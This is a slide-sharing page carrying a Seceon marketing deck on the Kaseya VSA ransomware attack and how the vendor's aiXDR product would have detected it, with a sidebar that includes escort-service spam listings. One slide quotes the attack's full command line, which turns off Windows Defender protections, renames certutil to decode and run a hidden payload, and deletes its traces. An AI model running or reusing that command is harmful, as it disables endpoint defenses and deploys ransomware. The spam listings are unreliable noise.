RE Capital's Visionary Leadership under Newman LeechRE Capital's Visionary Leadership under Newman Leech
RE Capital's Visionary Leadership under Newman LeechNewman George Leech
 
Monthly Social Media Update April 2024 pptx.pptx
Monthly Social Media Update April 2024 pptx.pptxMonthly Social Media Update April 2024 pptx.pptx
Monthly Social Media Update April 2024 pptx.pptxAndy Lambert
 
Sales & Marketing Alignment: How to Synergize for Success
Sales & Marketing Alignment: How to Synergize for SuccessSales & Marketing Alignment: How to Synergize for Success
Sales & Marketing Alignment: How to Synergize for SuccessAggregage
 
Call Girls In DLf Gurgaon ➥99902@11544 ( Best price)100% Genuine Escort In 24...
Call Girls In DLf Gurgaon ➥99902@11544 ( Best price)100% Genuine Escort In 24...Call Girls In DLf Gurgaon ➥99902@11544 ( Best price)100% Genuine Escort In 24...
Call Girls In DLf Gurgaon ➥99902@11544 ( Best price)100% Genuine Escort In 24...lizamodels9
 
Monte Carlo simulation : Simulation using MCSM
Monte Carlo simulation : Simulation using MCSMMonte Carlo simulation : Simulation using MCSM
Monte Carlo simulation : Simulation using MCSMRavindra Nath Shukla
 
Pharma Works Profile of Karan Communications
Pharma Works Profile of Karan CommunicationsPharma Works Profile of Karan Communications
Pharma Works Profile of Karan Communicationskarancommunications
 
DEPED Work From Home WORKWEEK-PLAN.docx
DEPED Work From Home WORKWEEK-PLAN.docxDEPED Work From Home WORKWEEK-PLAN.docx
DEPED Work From Home WORKWEEK-PLAN.docxRodelinaLaud
 
Yaroslav Rozhankivskyy: Три складові і три передумови максимальної продуктивн...
Yaroslav Rozhankivskyy: Три складові і три передумови максимальної продуктивн...Yaroslav Rozhankivskyy: Три складові і три передумови максимальної продуктивн...
Yaroslav Rozhankivskyy: Три складові і три передумови максимальної продуктивн...Lviv Startup Club
 
Socio-economic-Impact-of-business-consumers-suppliers-and.pptx
Socio-economic-Impact-of-business-consumers-suppliers-and.pptxSocio-economic-Impact-of-business-consumers-suppliers-and.pptx
Socio-economic-Impact-of-business-consumers-suppliers-and.pptxtrishalcan8
 
Call Girls Pune Just Call 9907093804 Top Class Call Girl Service Available
Call Girls Pune Just Call 9907093804 Top Class Call Girl Service AvailableCall Girls Pune Just Call 9907093804 Top Class Call Girl Service Available
Call Girls Pune Just Call 9907093804 Top Class Call Girl Service AvailableDipal Arora
 

Recently uploaded (20)

Call Girls Navi Mumbai Just Call 9907093804 Top Class Call Girl Service Avail...
Call Girls Navi Mumbai Just Call 9907093804 Top Class Call Girl Service Avail...Call Girls Navi Mumbai Just Call 9907093804 Top Class Call Girl Service Avail...
Call Girls Navi Mumbai Just Call 9907093804 Top Class Call Girl Service Avail...
 
MONA 98765-12871 CALL GIRLS IN LUDHIANA LUDHIANA CALL GIRL
MONA 98765-12871 CALL GIRLS IN LUDHIANA LUDHIANA CALL GIRLMONA 98765-12871 CALL GIRLS IN LUDHIANA LUDHIANA CALL GIRL
MONA 98765-12871 CALL GIRLS IN LUDHIANA LUDHIANA CALL GIRL
 
BEST ✨ Call Girls In Indirapuram Ghaziabad ✔️ 9871031762 ✔️ Escorts Service...
BEST ✨ Call Girls In Indirapuram Ghaziabad ✔️ 9871031762 ✔️ Escorts Service...BEST ✨ Call Girls In Indirapuram Ghaziabad ✔️ 9871031762 ✔️ Escorts Service...
BEST ✨ Call Girls In Indirapuram Ghaziabad ✔️ 9871031762 ✔️ Escorts Service...
 
Vip Dewas Call Girls #9907093804 Contact Number Escorts Service Dewas
Vip Dewas Call Girls #9907093804 Contact Number Escorts Service DewasVip Dewas Call Girls #9907093804 Contact Number Escorts Service Dewas
Vip Dewas Call Girls #9907093804 Contact Number Escorts Service Dewas
 
Keppel Ltd. 1Q 2024 Business Update Presentation Slides
Keppel Ltd. 1Q 2024 Business Update Presentation SlidesKeppel Ltd. 1Q 2024 Business Update Presentation Slides
Keppel Ltd. 1Q 2024 Business Update Presentation Slides
 
Progress Report - Oracle Database Analyst Summit
Progress Report - Oracle Database Analyst SummitProgress Report - Oracle Database Analyst Summit
Progress Report - Oracle Database Analyst Summit
 
7.pdf This presentation captures many uses and the significance of the number...
7.pdf This presentation captures many uses and the significance of the number...7.pdf This presentation captures many uses and the significance of the number...
7.pdf This presentation captures many uses and the significance of the number...
 
VIP Call Girls In Saharaganj ( Lucknow ) 🔝 8923113531 🔝 Cash Payment (COD) 👒
VIP Call Girls In Saharaganj ( Lucknow ) 🔝 8923113531 🔝 Cash Payment (COD) 👒VIP Call Girls In Saharaganj ( Lucknow ) 🔝 8923113531 🔝 Cash Payment (COD) 👒
VIP Call Girls In Saharaganj ( Lucknow ) 🔝 8923113531 🔝 Cash Payment (COD) 👒
 
Grateful 7 speech thanking everyone that has helped.pdf
Grateful 7 speech thanking everyone that has helped.pdfGrateful 7 speech thanking everyone that has helped.pdf
Grateful 7 speech thanking everyone that has helped.pdf
 
RE Capital's Visionary Leadership under Newman Leech
RE Capital's Visionary Leadership under Newman LeechRE Capital's Visionary Leadership under Newman Leech
RE Capital's Visionary Leadership under Newman Leech
 
Monthly Social Media Update April 2024 pptx.pptx
Monthly Social Media Update April 2024 pptx.pptxMonthly Social Media Update April 2024 pptx.pptx
Monthly Social Media Update April 2024 pptx.pptx
 
Sales & Marketing Alignment: How to Synergize for Success
Sales & Marketing Alignment: How to Synergize for SuccessSales & Marketing Alignment: How to Synergize for Success
Sales & Marketing Alignment: How to Synergize for Success
 
Call Girls In DLf Gurgaon ➥99902@11544 ( Best price)100% Genuine Escort In 24...
Call Girls In DLf Gurgaon ➥99902@11544 ( Best price)100% Genuine Escort In 24...Call Girls In DLf Gurgaon ➥99902@11544 ( Best price)100% Genuine Escort In 24...
Call Girls In DLf Gurgaon ➥99902@11544 ( Best price)100% Genuine Escort In 24...
 
Monte Carlo simulation : Simulation using MCSM
Monte Carlo simulation : Simulation using MCSMMonte Carlo simulation : Simulation using MCSM
Monte Carlo simulation : Simulation using MCSM
 
Pharma Works Profile of Karan Communications
Pharma Works Profile of Karan CommunicationsPharma Works Profile of Karan Communications
Pharma Works Profile of Karan Communications
 
DEPED Work From Home WORKWEEK-PLAN.docx
DEPED Work From Home WORKWEEK-PLAN.docxDEPED Work From Home WORKWEEK-PLAN.docx
DEPED Work From Home WORKWEEK-PLAN.docx
 
Yaroslav Rozhankivskyy: Три складові і три передумови максимальної продуктивн...
Yaroslav Rozhankivskyy: Три складові і три передумови максимальної продуктивн...Yaroslav Rozhankivskyy: Три складові і три передумови максимальної продуктивн...
Yaroslav Rozhankivskyy: Три складові і три передумови максимальної продуктивн...
 
Socio-economic-Impact-of-business-consumers-suppliers-and.pptx
Socio-economic-Impact-of-business-consumers-suppliers-and.pptxSocio-economic-Impact-of-business-consumers-suppliers-and.pptx
Socio-economic-Impact-of-business-consumers-suppliers-and.pptx
 
Forklift Operations: Safety through Cartoons
Forklift Operations: Safety through CartoonsForklift Operations: Safety through Cartoons
Forklift Operations: Safety through Cartoons
 
Call Girls Pune Just Call 9907093804 Top Class Call Girl Service Available
Call Girls Pune Just Call 9907093804 Top Class Call Girl Service AvailableCall Girls Pune Just Call 9907093804 Top Class Call Girl Service Available
Call Girls Pune Just Call 9907093804 Top Class Call Girl Service Available
 

How Seceon could have stopped the Ransomware roll over Kaseya.pptx

  • 1. How Seceon could have stopped the Ransomware roll over Kaseya. The attack and ways will keep on changing, one of the most Recent attack that Kaseya faced is the result of what & where industry is missing in terms of Cybersecurity. The attack on Kaseya came in action a few days ago. The sudden attack emerged in a brutal way infecting around 1500 businesses worldwide as per the statement by Kaseya’s CEO. The names of infected companies are not yet out. The observed result of this attackswas seen with Swedish Coop supermarket which was forced to close. They are among one of the clients of these MSPs which were hacked and got infected with 2100 endpoints.
  • 2. A $70 millions ransom was demanded for data backup. The REvil Ransomware gang is being considered responsible for this operation. It’s still a mystery whether REvil prepared this attack themselves or it was from any of their associates. Kaseya has been completely forced to shut down their cloud infrastructure to stop malicious updates from spreading and they completely advised their customer to power down their servers and that’s created a lot of chaos. What is VSA, How it got compromised and Ransomware rolled over it.. VSA is a remote monitoring tool, a kind of remote access tool or RAT that allows to have the complete access of system or device it’s installed on, which helps IT Technicians to diagnose and fix problems remotely. Every organization doesn’t have resources to manage their infrastructure in house, so they outsource this as a task to MSP (Managed Service Provider). These MSPs often manage the system of hundreds of companies simultaneously. Kaseya is an MSP provider with VSA as a product it has its own prem version, which is run by the customer in their environment, this is typically needed by MSPs to manage all their client system and this was something that was off with Kaseya server that was used to manage lot of their clients. Having the access of this server will itself allow it to have the access of all clients associated with it. And this how it was compromised at initial. Soon after the attack rolled out all the VSA Server were advised to close. The operation was huge enough to infect the business, it was the mass ransomware unlike the ransomware that we know usually where organizations get infected with Ransomware and all system they get encrypt and are ask for ransom, here case was quite different where 100’s of organization around the world got encrypted simultaneously with the same ransomware campaign which was tunnelled during the software update in Kaseya, since from the inception it moved in a supply chain attack. It was a kind of compromise of Kaseya which was operated on VSA
  • 3. server rather than any of their directory directly that we usually see in Ransomware. The VSA server was used to ransomware a lot of organizations in single click and this is what has happened at high level in it. How does it propagate? The scenario is like If there is a device using Kaseya’s agent to monitor all the device subjected to policy and that is connected to central server and that server is affected then the entire system connected with it is at higher risk, and this is how it propagated in the form of chain attack one after the other and affected 1000s of server. How did the initial compromise begin and aiXDR detection? As VSA server vulnerability was exploited, Seceon aiXDR can detect and remediate exploited vulnerabilities and zero day attack in very early stages. Here is the steps by steps analysis: 1.aiXDR monitors all inbound and outbound connections and in this case aiXDR should have detected a connection from Blacklisted IPs or from a prohibited country and automatically blocked that connection. 2.Once connection was made it was trying to download/upload agent.exe on the host , aiXDR can detect data exfiltration and in this case aiXDR should have blocked that connection so it can not download the agent.exe or transfers the data to external hosts. 3.Also when the host had agent.exe downloaded, it was doing a different type of scan to get access to another host – aiXDR should have detected those scans and automatically quarantined that host so it can not infect other hosts. 4.Following PowerShell command was launched by the C:Program Files (x86)Kaseya<ID>AgentMon.exe file of the Kaseya VSA platform. “C:WINDOWSsystem32cmd.exe” /c ping 127.0.0.1 -n 4979 > nul & C:WindowsSystem32WindowsPowerShellv1.0powershell.exe Set- MpPreference
  • 4. -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:WindowsSystem32certutil.exe C:Windowscert.exe & echo %RANDOM% >> C:Windowscert.exe & C:Windowscert.exe -decode c:kworkingagent.crt c:kworkingagent.exe & del /q /f c:kworkingagent.crt C:Windowscert.exe & c:kworkingagent.exe 5.As the AgentMon.exe starts its 1st process to execute the powershell command the aiXDR would have detected a new process started as AgentMon.exe from C:Program Files (x86)Kaseya 6.aiXDR detects if any protection service is disabled on the host as we can see in this case they were trying to disable protection services 7.aiXDR detects if any process is renamed as Masquerading as we can see in this case certutil.exe was renamed as cert.exe . What was the impact of this? The threat actor was able to manage execution of code that enabled them to search scripts that linked with Kaseya’s application to pull out certain procedures or agent updates. It was part of the functionality of the application to push out procedures through all managed agents. These agents run on the computer which is managed by this solution. They simply run the script to all managed clients and that triggered a file copy and execution of script to all managed clients. This is how they ended by infecting all these systems. There were a couple of steps that were initiated step by step to make a complete successful attempt for attack but surprisingly it was never looked at and detected in between.
  • 5. Approach after Infected ? There are always different indicators left on the system to know how it’s being compromised or not, here in this case it has been identified that logs have been cleared at multiple stages. The logs were gone and other types of logs inside the application database itself were deleted but still some logs were there to know what VSA server has put out to manage clients. These logs became a point to bring out the investigation of how the system was targeted from the VSA server. Few indications of Being Ransomware. Ransomware is coming out as a complete business model and the threat actors are making a lot of money out of it. Below are few indications mentioned below: • All files in the system get encrypted and left with a README file saying about ransom amount. It will change the file extension which is a clear indication of attack occurrence. • Some of the files they may or may not get encrypted this happen in the case where ransomware did not execute successfully i.e it gets executed partially. • Provisional execution that disables antivirus functionality such as Windows defender or other security layers. Brief About Seceon aiXDR Seceon aiXDR is highly effective, enriched with capability of machine learning, AI, Big data, Dynamic threat intel, strong correlation and in-depth analysis which easily allows to cut & throw the threat roots at very initial stage. The solution detects the threat origin whether it’s coming from Network, application, host or machine learning. It comes out with one of the most interesting feature to show anything and everything that was done to make the attack attempt and how Seceon solution stopped the way in between to make the
  • 6. ... environment secure with 360 degree Comprehensive visibility, Proactive Threat Detection, Auto stopping of Threat and breaches in Real time. The customer should always make sure that they are not just taking a solution which is problem specific, the solution should always be capable of saving the environment from all kinds of threat and malicious activity whether it is known or unknown. The Seceon aiXDR is a single all-in-one platform. That helps to eliminate the use of silos based solutions and delivers the effective essential result in Comprehensive manner. Diag. show the Seceon aiXDR approach “Continuous real-time Monitoring, proactive Detection & auto Stop threats and breaches” Best Cybersecurity ROI.
  • 7. Contact Us Address -238 Littleton Road, Suite #206,Westford, MA 01886, USA Phone Number - +1 (978)-923-0040 Email Id - sales@seceon.com , info@seceon.com Website - https://www.seceon.com/ Twitter - https://twitter.com/Seceon_Inc